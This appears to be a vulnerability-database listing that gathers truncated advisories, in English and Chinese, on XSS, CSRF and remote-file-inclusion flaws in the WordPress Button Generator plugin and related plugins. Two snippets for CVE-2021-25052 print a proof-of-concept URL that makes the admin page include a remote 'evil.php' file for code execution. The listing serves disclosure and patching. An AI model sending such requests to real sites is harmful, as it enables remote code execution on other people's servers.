WordPress plugin Button Generator – easily Button Builder 跨站脚本漏洞

WordPress and WordPress plugin are both products of the WordPress Foundation.WordPress is a blogging platform developed using the PHP language. The platform supports personal blog sites on servers running PHP and MySQL.WordPress plugin is an application plugin. A cross-site scripting vulnerabilit...

PT-2023-21140 · Unknown · Wow-Company Button Generator

Name of the Vulnerable Software and Affected Versions: Wow-Company Button Generator – easily Button Builder plugin versions prior to 2.3.3 Description: The issue is related to a Stored Cross-Site Scripting XSS vulnerability that requires authentication with admin+ privileges. Recommendations: For...

Cross site scripting

The Float menu WordPress plugin before 5.0.2, Bubble Menu WordPress plugin before 3.0.4, Button Generator WordPress plugin before 2.3.5, Calculator Builder WordPress plugin before 1.5.1, Counter Box WordPress plugin before 1.2.2, Floating Button WordPress plugin before 5.3.1, Herd Effects WordPre...

WordPress Plugin Float menu 跨站脚本漏洞

WordPress and WordPress plugin are both products of the WordPress Foundation.WordPress is a blogging platform developed using the PHP language. The platform supports setting up personal blog sites on servers with PHP and MySQL. WordPress plugin is an application plugin. WordPress Plugin Float men...

PT-2023-19080 · WordPress · Float Menu +11

Name of the Vulnerable Software and Affected Versions: Float menu WordPress plugin versions prior to 5.0.2 Bubble Menu WordPress plugin versions prior to 3.0.4 Button Generator WordPress plugin versions prior to 2.3.5 Calculator Builder WordPress plugin versions prior to 1.5.1 Counter Box WordPre...

WordPress Button Generator – easily Button Builder Plugin <= 2.3.5 is vulnerable to Cross Site Request Forgery (CSRF)

Software Button Generator – easily Button Builder Type Plugin Vulnerable versions = 2.3.5 Fixed in 2.3.6 OWASP Top 10 A5: Broken Access Control Classification Cross Site Request Forgery CSRF CVE CVE-2023-25443 Patch priority Low CVSS severity Low 4.3 Developer Claim ownership PSID ad530edff5de...

WordPress Button Generator – easily Button Builder Plugin <= 2.3.3 is vulnerable to Cross Site Scripting (XSS)

Software Button Generator – easily Button Builder Type Plugin Vulnerable versions = 2.3.3 Fixed in 2.3.4 OWASP Top 10 A7: Cross-Site Scripting XSS Classification Cross Site Scripting XSS CVE CVE-2023-27452 Patch priority Low CVSS severity Low 5.9 Developer Claim ownership PSID 5f62ad483358 Credit...

CVE-2021-25052

The Button Generator WordPress plugin before 2.3.3 within the wow-company admin menu page allows to include arbitrary file with PHP extension as well as with data:// or http:// protocols, thus leading to CSRF RCE...

CVE-2021-25052

CVE-2021-25052 affects the WordPress Button Generator plugin (pre-2.3.3) in the wow-company admin menu. A flaw in how include() handles PHP files (and data:///http:// resources) enables remote file inclusion, which can lead to CSRF and remote code execution. Remediation: upgrade to version 2.3.3 ...

WordPress plugin Button Generator 跨站请求伪造漏洞

WordPress is the Wordpress Foundation's set of blogging platforms developed using the PHP language. The WordPress Button Generator Plugin has a file inclusion vulnerability prior to 2.3.3. The vulnerability stems from the fact that the plugin does not effectively filter calls to remote file...

WordPress Button Generator – easily Button Builder plugin <= 2.3.2 - Remote File Inclusion (RFI) leading to Remote Code Execution (RCE) via CSRF vulnerability

Remote File Inclusion RFI leading to Remote Code Execution RCE via CSRF vulnerability discovered by Krzysztof Zając in WordPress Button Generator – easily Button Builder plugin versions = 2.3.2. Solution Update the WordPress Button Generator – easily Button Builder plugin to the latest available...

Button Generator < 2.3.3 - RFI leading to RCE via CSRF

The plugin within the wow-company admin menu page allows to include arbitrary file with PHP extension as well as with data:// or http:// protocols, thus leading to CSRF RCE. PoC http://127.0.0.1:8001/wp-admin/admin.php?page=wow-company=https%3A%2F%2Fstatic.kazet.cc%2Fevil.php%3F PHP's...

Button Generator < 2.3.3 - RFI leading to RCE via CSRF

The plugin within the wow-company admin menu page allows to include arbitrary file with PHP extension as well as with data:// or http:// protocols, thus leading to CSRF RCE. http://127.0.0.1:8001/wp-admin/admin.php?page=wow-company&tab=https%3A%2F%2Fstatic.kazet.cc%2Fevil.php%3F PHP's...

CVE-2021-38358

The MoolaMojo WordPress plugin is vulnerable to Reflected Cross-Site Scripting via the classes parameter found in the /views/button-generator.html.php file which allows attackers to inject arbitrary web scripts, in versions up to and including 0.7.4.1...

WordPress 插件跨站脚本漏洞

WordPress is the Wordpress Foundation's set of blogging platform developed using the PHP language . The platform supports setting up personal blog sites on servers with PHP and MySQL.WordPress Plugin is an open source application plugin for WordPress. A cross-site scripting vulnerability exists i...